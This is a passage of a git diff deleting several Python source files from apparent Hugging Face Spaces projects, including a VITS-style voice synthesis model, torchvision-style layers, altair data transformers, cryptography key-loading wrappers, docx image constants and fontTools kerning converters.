-1,351 +0,0 @@ -import copy -import math -import torch -from torch import nn -from torch.nn import functional as F - -import attentions -import commons -import modules - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from commons import init_weights, get_padding -from vdecoder.hifigan.models import Generator -from utils import f0_to_coarse - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append(modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - # print(x.shape,x_lengths.shape) - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - filter_channels=None, - n_heads=None, - p_dropout=None): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - self.f0_emb = nn.Embedding(256, hidden_channels) - - self.enc_ = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - - def forward(self, x, x_lengths, f0=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = x + self.f0_emb(f0).transpose(1,2) - x = self.enc_(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - - return z, m, logs, x_mask - - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2,3,5,7,11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class SpeakerEncoder(torch.nn.Module): - def __init__(self, mel_n_channels=80, model_num_layers=3, model_hidden_size=256, model_embedding_size=256): - super(SpeakerEncoder, self).__init__() - self.lstm = nn.LSTM(mel_n_channels, model_hidden_size, model_num_layers, batch_first=True) - self.linear = nn.Linear(model_hidden_size, model_embedding_size) - self.relu = nn.ReLU() - - def forward(self, mels): - self.lstm.flatten_parameters() - _, (hidden, _) = self.lstm(mels) - embeds_raw = self.relu(self.linear(hidden[-1])) - return embeds_raw / torch.norm(embeds_raw, dim=1, keepdim=True) - - def compute_partial_slices(self, total_frames, partial_frames, partial_hop): - mel_slices = [] - for i in range(0, total_frames-partial_frames, partial_hop): - mel_range = torch.arange(i, i+partial_frames) - mel_slices.append(mel_range) - - return mel_slices - - def embed_utterance(self, mel, partial_frames=128, partial_hop=64): - mel_len = mel.size(1) - last_mel = mel[:,-partial_frames:] - - if mel_len > partial_frames: - mel_slices = self.compute_partial_slices(mel_len, partial_frames, partial_hop) - mels = list(mel[:,s] for s in mel_slices) - mels.append(last_mel) - mels = torch.stack(tuple(mels), 0).squeeze(1) - - with torch.no_grad(): - partial_embeds = self(mels) - embed = torch.mean(partial_embeds, axis=0).unsqueeze(0) - #embed = embed / torch.linalg.norm(embed, 2) - else: - with torch.no_grad(): - embed = self(last_mel) - - return embed - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - ssl_dim, - n_speakers, - **kwargs): - - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - self.ssl_dim = ssl_dim - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - self.enc_p_ = TextEncoder(ssl_dim, inter_channels, hidden_channels, 5, 1, 16,0, filter_channels, n_heads, p_dropout) - hps = { - "sampling_rate": 32000, - "inter_channels": 192, - "resblock": "1", - "resblock_kernel_sizes": [3, 7, 11], - "resblock_dilation_sizes": [[1, 3, 5], [1, 3, 5], [1, 3, 5]], - "upsample_rates": [10, 8, 2, 2], - "upsample_initial_channel": 512, - "upsample_kernel_sizes": [16, 16, 4, 4], - "gin_channels": 256, - } - self.dec = Generator(h=hps) - self.enc_q = Encoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - - def forward(self, c, f0, spec, g=None, mel=None, c_lengths=None, spec_lengths=None): - if c_lengths == None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - if spec_lengths == None: - spec_lengths = (torch.ones(spec.size(0)) * spec.size(-1)).to(spec.device) - - g = self.emb_g(g).transpose(1,2) - - z_ptemp, m_p, logs_p, _ = self.enc_p_(c, c_lengths, f0=f0_to_coarse(f0)) - z, m_q, logs_q, spec_mask = self.enc_q(spec, spec_lengths, g=g) - - z_p = self.flow(z, spec_mask, g=g) - z_slice, pitch_slice, ids_slice = commons.rand_slice_segments_with_pitch(z, f0, spec_lengths, self.segment_size) - - # o = self.dec(z_slice, g=g) - o = self.dec(z_slice, g=g, f0=pitch_slice) - - return o, ids_slice, spec_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, c, f0, g=None, mel=None, c_lengths=None): - if c_lengths == None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - g = self.emb_g(g).transpose(1,2) - - z_p, m_p, logs_p, c_mask = self.enc_p_(c, c_lengths, f0=f0_to_coarse(f0)) - z = self.flow(z_p, c_mask, g=g, reverse=True) - - o = self.dec(z * c_mask, g=g, f0=f0) - - return o diff --git a/spaces/chlab/interactive_kinematic_planet_detector/utils/vision_modifications.py b/spaces/chlab/interactive_kinematic_planet_detector/utils/vision_modifications.py deleted file mode 100644 index 14151748ba4a57cdfcfc64b4ba83c4d6009294bb..0000000000000000000000000000000000000000 --- a/spaces/chlab/interactive_kinematic_planet_detector/utils/vision_modifications.py +++ /dev/null @@ -1,310 +0,0 @@ -import warnings -from typing import Callable, List, Optional - -import torch -from torch import Tensor - -interpolate = torch.nn.functional.interpolate - - -class FrozenBatchNorm2d(torch.nn.Module): - """ - BatchNorm2d where the batch statistics and the affine parameters are fixed - - Args: - num_features (int): Number of features ``C`` from an expected input of size ``(N, C, H, W)`` - eps (float): a value added to the denominator for numerical stability. Default: 1e-5 - """ - - def __init__( - self, - num_features: int, - eps: float = 1e-5, - ): - super().__init__() - # _log_api_usage_once(self) - self.eps = eps - self.register_buffer("weight", torch.ones(num_features)) - self.register_buffer("bias", torch.zeros(num_features)) - self.register_buffer("running_mean", torch.zeros(num_features)) - self.register_buffer("running_var", torch.ones(num_features)) - - def _load_from_state_dict( - self, - state_dict: dict, - prefix: str, - local_metadata: dict, - strict: bool, - missing_keys: List[str], - unexpected_keys: List[str], - error_msgs: List[str], - ): - num_batches_tracked_key = prefix + "num_batches_tracked" - if num_batches_tracked_key in state_dict: - del state_dict[num_batches_tracked_key] - - super()._load_from_state_dict( - state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs - ) - - def forward(self, x: Tensor) -> Tensor: - # move reshapes to the beginning - # to make it fuser-friendly - w = self.weight.reshape(1, -1, 1, 1) - b = self.bias.reshape(1, -1, 1, 1) - rv = self.running_var.reshape(1, -1, 1, 1) - rm = self.running_mean.reshape(1, -1, 1, 1) - scale = w * (rv + self.eps).rsqrt() - bias = b - rm * scale - return x * scale + bias - - def __repr__(self) -> str: - return f"{self.__class__.__name__}({self.weight.shape[0]}, eps={self.eps})" - - -class ConvNormActivation(torch.nn.Sequential): - def __init__( - self, - in_channels: int, - out_channels: int, - kernel_size: int = 3, - stride: int = 1, - padding: Optional[int] = None, - groups: int = 1, - norm_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.BatchNorm2d, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - dilation: int = 1, - inplace: Optional[bool] = True, - bias: Optional[bool] = None, - conv_layer: Callable[..., torch.nn.Module] = torch.nn.Conv2d, - ) -> None: - - if padding is None: - padding = (kernel_size - 1) // 2 * dilation - if bias is None: - bias = norm_layer is None - - layers = [ - conv_layer( - in_channels, - out_channels, - kernel_size, - stride, - padding, - dilation=dilation, - groups=groups, - bias=bias, - ) - ] - - if norm_layer is not None: - layers.append(norm_layer(out_channels)) - - if activation_layer is not None: - params = {} if inplace is None else {"inplace": inplace} - layers.append(activation_layer(**params)) - super().__init__(*layers) - # _log_api_usage_once(self) - self.out_channels = out_channels - - if self.__class__ == ConvNormActivation: - warnings.warn( - "Don't use ConvNormActivation directly, please use Conv2dNormActivation and Conv3dNormActivation instead." - ) - - -class Conv2dNormActivation(ConvNormActivation): - """ - Configurable block used for Convolution2d-Normalization-Activation blocks. - - Args: - in_channels (int): Number of channels in the input image - out_channels (int): Number of channels produced by the Convolution-Normalization-Activation block - kernel_size: (int, optional): Size of the convolving kernel. Default: 3 - stride (int, optional): Stride of the convolution. Default: 1 - padding (int, tuple or str, optional): Padding added to all four sides of the input. Default: None, in which case it will calculated as ``padding = (kernel_size - 1) // 2 * dilation`` - groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 - norm_layer (Callable[..., torch.nn.Module], optional): Norm layer that will be stacked on top of the convolution layer. If ``None`` this layer wont be used. Default: ``torch.nn.BatchNorm2d`` - activation_layer (Callable[..., torch.nn.Module], optional): Activation function which will be stacked on top of the normalization layer (if not None), otherwise on top of the conv layer. If ``None`` this layer wont be used. Default: ``torch.nn.ReLU`` - dilation (int): Spacing between kernel elements. Default: 1 - inplace (bool): Parameter for the activation layer, which can optionally do the operation in-place. Default ``True`` - bias (bool, optional): Whether to use bias in the convolution layer. By default, biases are included if ``norm_layer is None``. - - """ - - def __init__( - self, - in_channels: int, - out_channels: int, - kernel_size: int = 3, - stride: int = 1, - padding: Optional[int] = None, - groups: int = 1, - norm_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.BatchNorm2d, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - dilation: int = 1, - inplace: Optional[bool] = True, - bias: Optional[bool] = None, - ) -> None: - - super().__init__( - in_channels, - out_channels, - kernel_size, - stride, - padding, - groups, - norm_layer, - activation_layer, - dilation, - inplace, - bias, - torch.nn.Conv2d, - ) - - -class Conv3dNormActivation(ConvNormActivation): - """ - Configurable block used for Convolution3d-Normalization-Activation blocks. - - Args: - in_channels (int): Number of channels in the input video. - out_channels (int): Number of channels produced by the Convolution-Normalization-Activation block - kernel_size: (int, optional): Size of the convolving kernel. Default: 3 - stride (int, optional): Stride of the convolution. Default: 1 - padding (int, tuple or str, optional): Padding added to all four sides of the input. Default: None, in which case it will calculated as ``padding = (kernel_size - 1) // 2 * dilation`` - groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 - norm_layer (Callable[..., torch.nn.Module], optional): Norm layer that will be stacked on top of the convolution layer. If ``None`` this layer wont be used. Default: ``torch.nn.BatchNorm3d`` - activation_layer (Callable[..., torch.nn.Module], optional): Activation function which will be stacked on top of the normalization layer (if not None), otherwise on top of the conv layer. If ``None`` this layer wont be used. Default: ``torch.nn.ReLU`` - dilation (int): Spacing between kernel elements. Default: 1 - inplace (bool): Parameter for the activation layer, which can optionally do the operation in-place. Default ``True`` - bias (bool, optional): Whether to use bias in the convolution layer. By default, biases are included if ``norm_layer is None``. - """ - - def __init__( - self, - in_channels: int, - out_channels: int, - kernel_size: int = 3, - stride: int = 1, - padding: Optional[int] = None, - groups: int = 1, - norm_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.BatchNorm3d, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - dilation: int = 1, - inplace: Optional[bool] = True, - bias: Optional[bool] = None, - ) -> None: - - super().__init__( - in_channels, - out_channels, - kernel_size, - stride, - padding, - groups, - norm_layer, - activation_layer, - dilation, - inplace, - bias, - torch.nn.Conv3d, - ) - - -class SqueezeExcitation(torch.nn.Module): - """ - This block implements the Squeeze-and-Excitation block from https://arxiv.org/abs/1709.01507 (see Fig. 1). - Parameters ``activation``, and ``scale_activation`` correspond to ``delta`` and ``sigma`` in eq. 3. - - Args: - input_channels (int): Number of channels in the input image - squeeze_channels (int): Number of squeeze channels - activation (Callable[..., torch.nn.Module], optional): ``delta`` activation. Default: ``torch.nn.ReLU`` - scale_activation (Callable[..., torch.nn.Module]): ``sigma`` activation. Default: ``torch.nn.Sigmoid`` - """ - - def __init__( - self, - input_channels: int, - squeeze_channels: int, - activation: Callable[..., torch.nn.Module] = torch.nn.ReLU, - scale_activation: Callable[..., torch.nn.Module] = torch.nn.Sigmoid, - ) -> None: - super().__init__() - # _log_api_usage_once(self) - self.avgpool = torch.nn.AdaptiveAvgPool2d(1) - self.fc1 = torch.nn.Conv2d(input_channels, squeeze_channels, 1) - self.fc2 = torch.nn.Conv2d(squeeze_channels, input_channels, 1) - self.activation = activation() - self.scale_activation = scale_activation() - - def _scale(self, input: Tensor) -> Tensor: - scale = self.avgpool(input) - scale = self.fc1(scale) - scale = self.activation(scale) - scale = self.fc2(scale) - return self.scale_activation(scale) - - def forward(self, input: Tensor) -> Tensor: - scale = self._scale(input) - return scale * input - - -class MLP(torch.nn.Sequential): - """This block implements the multi-layer perceptron (MLP) module. - - Args: - in_channels (int): Number of channels of the input - hidden_channels (List[int]): List of the hidden channel dimensions - norm_layer (Callable[..., torch.nn.Module], optional): Norm layer that will be stacked on top of the convolution layer. If ``None`` this layer wont be used. Default: ``None`` - activation_layer (Callable[..., torch.nn.Module], optional): Activation function which will be stacked on top of the normalization layer (if not None), otherwise on top of the conv layer. If ``None`` this layer wont be used. Default: ``torch.nn.ReLU`` - inplace (bool): Parameter for the activation layer, which can optionally do the operation in-place. Default ``True`` - bias (bool): Whether to use bias in the linear layer. Default ``True`` - dropout (float): The probability for the dropout layer. Default: 0.0 - """ - - def __init__( - self, - in_channels: int, - hidden_channels: List[int], - norm_layer: Optional[Callable[..., torch.nn.Module]] = None, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - inplace: Optional[bool] = True, - bias: bool = True, - dropout: float = 0.0, - ): - # The addition of `norm_layer` is inspired from the implementation of TorchMultimodal: - # https://github.com/facebookresearch/multimodal/blob/5dec8a/torchmultimodal/modules/layers/mlp.py - params = {} if inplace is None else {"inplace": inplace} - - layers = [] - in_dim = in_channels - for hidden_dim in hidden_channels[:-1]: - layers.append(torch.nn.Linear(in_dim, hidden_dim, bias=bias)) - if norm_layer is not None: - layers.append(norm_layer(hidden_dim)) - layers.append(activation_layer(**params)) - layers.append(torch.nn.Dropout(dropout, **params)) - in_dim = hidden_dim - - layers.append(torch.nn.Linear(in_dim, hidden_channels[-1], bias=bias)) - layers.append(torch.nn.Dropout(dropout, **params)) - - super().__init__(*layers) - # _log_api_usage_once(self) - - -class Permute(torch.nn.Module): - """This module returns a view of the tensor input with its dimensions permuted. - - Args: - dims (List[int]): The desired ordering of dimensions - """ - - def __init__(self, dims: List[int]): - super().__init__() - self.dims = dims - - def forward(self, x: Tensor) -> Tensor: - return torch.permute(x, self.dims) \ No newline at end of file diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/vegalite/v5/data.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/vegalite/v5/data.py deleted file mode 100644 index 703dffb3246a32f4734f0653dfcc1aaa0d1d23f9..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/vegalite/v5/data.py +++ /dev/null @@ -1,43 +0,0 @@ -from ..data import ( - MaxRowsError, - curry, - default_data_transformer, - limit_rows, - pipe, - sample, - to_csv, - to_json, - to_values, - DataTransformerRegistry, -) - - -# ============================================================================== -# VegaLite 5 data transformers -# ============================================================================== - - -ENTRY_POINT_GROUP = "altair.vegalite.v5.data_transformer" # type: str - - -data_transformers = DataTransformerRegistry( - entry_point_group=ENTRY_POINT_GROUP -) # type: DataTransformerRegistry -data_transformers.register("default", default_data_transformer) -data_transformers.register("json", to_json) -data_transformers.register("csv", to_csv) -data_transformers.enable("default") - - -__all__ = ( - "MaxRowsError", - "curry", - "default_data_transformer", - "limit_rows", - "pipe", - "sample", - "to_csv", - "to_json", - "to_values", - "data_transformers", -) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/cryptography/hazmat/primitives/serialization/base.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/cryptography/hazmat/primitives/serialization/base.py deleted file mode 100644 index 18a96ccfd5cd8a2fe04c6778bc9ed82f8b0e6e7e..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/cryptography/hazmat/primitives/serialization/base.py +++ /dev/null @@ -1,73 +0,0 @@ -# This file is dual licensed under the terms of the Apache License, Version -# 2.0, and the BSD License. See the LICENSE file in the root of this repository -# for complete details. - -from __future__ import annotations - -import typing - -from cryptography.hazmat.primitives.asymmetric import dh -from cryptography.hazmat.primitives.asymmetric.types import ( - PrivateKeyTypes, - PublicKeyTypes, -) - - -def load_pem_private_key( - data: bytes, - password: typing.Optional[bytes], - backend: typing.Any = None, - *, - unsafe_skip_rsa_key_validation: bool = False, -) -> PrivateKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_pem_private_key( - data, password, unsafe_skip_rsa_key_validation - ) - - -def load_pem_public_key( - data: bytes, backend: typing.Any = None -) -> PublicKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_pem_public_key(data) - - -def load_pem_parameters( - data: bytes, backend: typing.Any = None -) -> dh.DHParameters: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_pem_parameters(data) - - -def load_der_private_key( - data: bytes, - password: typing.Optional[bytes], - backend: typing.Any = None, - *, - unsafe_skip_rsa_key_validation: bool = False, -) -> PrivateKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_der_private_key( - data, password, unsafe_skip_rsa_key_validation - ) - - -def load_der_public_key( - data: bytes, backend: typing.Any = None -) -> PublicKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_der_public_key(data) - - -def load_der_parameters( - data: bytes, backend: typing.Any = None -) -> dh.DHParameters: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_der_parameters(data) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/image/constants.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/image/constants.py deleted file mode 100644 index 90b469705e8aa42382295e1670ab16951232ae4f..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/image/constants.py +++ /dev/null @@ -1,169 +0,0 @@ -# encoding: utf-8 - -""" -Constants specific the the image sub-package -""" - - -class JPEG_MARKER_CODE(object): - """ - JPEG marker codes - """ - TEM = b'\x01' - DHT = b'\xC4' - DAC = b'\xCC' - JPG = b'\xC8' - - SOF0 = b'\xC0' - SOF1 = b'\xC1' - SOF2 = b'\xC2' - SOF3 = b'\xC3' - SOF5 = b'\xC5' - SOF6 = b'\xC6' - SOF7 = b'\xC7' - SOF9 = b'\xC9' - SOFA = b'\xCA' - SOFB = b'\xCB' - SOFD = b'\xCD' - SOFE = b'\xCE' - SOFF = b'\xCF' - - RST0 = b'\xD0' - RST1 = b'\xD1' - RST2 = b'\xD2' - RST3 = b'\xD3' - RST4 = b'\xD4' - RST5 = b'\xD5' - RST6 = b'\xD6' - RST7 = b'\xD7' - - SOI = b'\xD8' - EOI = b'\xD9' - SOS = b'\xDA' - DQT = b'\xDB' # Define Quantization Table(s) - DNL = b'\xDC' - DRI = b'\xDD' - DHP = b'\xDE' - EXP = b'\xDF' - - APP0 = b'\xE0' - APP1 = b'\xE1' - APP2 = b'\xE2' - APP3 = b'\xE3' - APP4 = b'\xE4' - APP5 = b'\xE5' - APP6 = b'\xE6' - APP7 = b'\xE7' - APP8 = b'\xE8' - APP9 = b'\xE9' - APPA = b'\xEA' - APPB = b'\xEB' - APPC = b'\xEC' - APPD = b'\xED' - APPE = b'\xEE' - APPF = b'\xEF' - - STANDALONE_MARKERS = ( - TEM, SOI, EOI, RST0, RST1, RST2, RST3, RST4, RST5, RST6, RST7 - ) - - SOF_MARKER_CODES = ( - SOF0, SOF1, SOF2, SOF3, SOF5, SOF6, SOF7, SOF9, SOFA, SOFB, SOFD, - SOFE, SOFF - ) - - marker_names = { - b'\x00': 'UNKNOWN', - b'\xC0': 'SOF0', - b'\xC2': 'SOF2', - b'\xC4': 'DHT', - b'\xDA': 'SOS', # start of scan - b'\xD8': 'SOI', # start of image - b'\xD9': 'EOI', # end of image - b'\xDB': 'DQT', - b'\xE0': 'APP0', - b'\xE1': 'APP1', - b'\xE2': 'APP2', - b'\xED': 'APP13', - b'\xEE': 'APP14', - } - - @classmethod - def is_standalone(cls, marker_code): - return marker_code in cls.STANDALONE_MARKERS - - -class MIME_TYPE(object): - """ - Image content types - """ - BMP = 'image/bmp' - GIF = 'image/gif' - JPEG = 'image/jpeg' - PNG = 'image/png' - TIFF = 'image/tiff' - - -class PNG_CHUNK_TYPE(object): - """ - PNG chunk type names - """ - IHDR = 'IHDR' - pHYs = 'pHYs' - IEND = 'IEND' - - -class TIFF_FLD_TYPE(object): - """ - Tag codes for TIFF Image File Directory (IFD) entries. - """ - BYTE = 1 - ASCII = 2 - SHORT = 3 - LONG = 4 - RATIONAL = 5 - - field_type_names = { - 1: 'BYTE', 2: 'ASCII char', 3: 'SHORT', 4: 'LONG', - 5: 'RATIONAL' - } - - -TIFF_FLD = TIFF_FLD_TYPE - - -class TIFF_TAG(object): - """ - Tag codes for TIFF Image File Directory (IFD) entries. - """ - IMAGE_WIDTH = 0x0100 - IMAGE_LENGTH = 0x0101 - X_RESOLUTION = 0x011A - Y_RESOLUTION = 0x011B - RESOLUTION_UNIT = 0x0128 - - tag_names = { - 0x00FE: 'NewSubfileType', - 0x0100: 'ImageWidth', - 0x0101: 'ImageLength', - 0x0102: 'BitsPerSample', - 0x0103: 'Compression', - 0x0106: 'PhotometricInterpretation', - 0x010E: 'ImageDescription', - 0x010F: 'Make', - 0x0110: 'Model', - 0x0111: 'StripOffsets', - 0x0112: 'Orientation', - 0x0115: 'SamplesPerPixel', - 0x0117: 'StripByteCounts', - 0x011A: 'XResolution', - 0x011B: 'YResolution', - 0x011C: 'PlanarConfiguration', - 0x0128: 'ResolutionUnit', - 0x0131: 'Software', - 0x0132: 'DateTime', - 0x0213: 'YCbCrPositioning', - 0x8769: 'ExifTag', - 0x8825: 'GPS IFD', - 0xC4A5: 'PrintImageMatching', - } diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/ufoLib/converters.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/ufoLib/converters.py deleted file mode 100644 index daccf782727be132a16318fd7085e19def7e1139..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/ufoLib/converters.py +++ /dev/null @@ -1,335 +0,0 @@ -""" -Conversion functions. -""" - - -# adapted from the UFO spec - - -def convertUFO1OrUFO2KerningToUFO3Kerning(kerning, groups, glyphSet=()): - # gather known kerning groups based on the prefixes - firstReferencedGroups, secondReferencedGroups = findKnownKerningGroups(groups) - # Make lists of groups referenced in kerning pairs. - for first, seconds in list(kerning.items()): - if first in groups and first not in glyphSet: - if not first.startswith("public.kern1."): - firstReferencedGroups.add(first) - for second in list(seconds.keys()): - if second in groups and second not in glyphSet: - if not second.startswith("public.kern2."): - secondReferencedGroups.add(second) - # Create new names for these groups. - firstRenamedGroups = {} - for first in firstReferencedGroups: - # Make a list of existing group names. - existingGroupNames = list(groups.keys()) + list(firstRenamedGroups.keys()) - # Remove the old prefix from the name - newName = first.replace("@MMK_L_", "") - # Add the new prefix to the name. - newName = "public.kern1." + newName - # Make a unique group name. - newName = makeUniqueGroupName(newName, existingGroupNames) - # Store for use later. - firstRenamedGroups[first] = newName - secondRenamedGroups = {} - for second in secondReferencedGroups: - # Make a list of existing group names. - existingGroupNames = list(groups.keys()) + list(secondRenamedGroups.keys()) - # Remove the old prefix from the name - newName = second.replace("@MMK_R_", "") - # Add the new prefix to the name. - newName = "public.kern2." + newName - # Make a unique group name. - newName = makeUniqueGroupName(newName, existingGroupNames) - # Store for use later. - secondRenamedGroups[second] = newName - # Populate the new group names into the 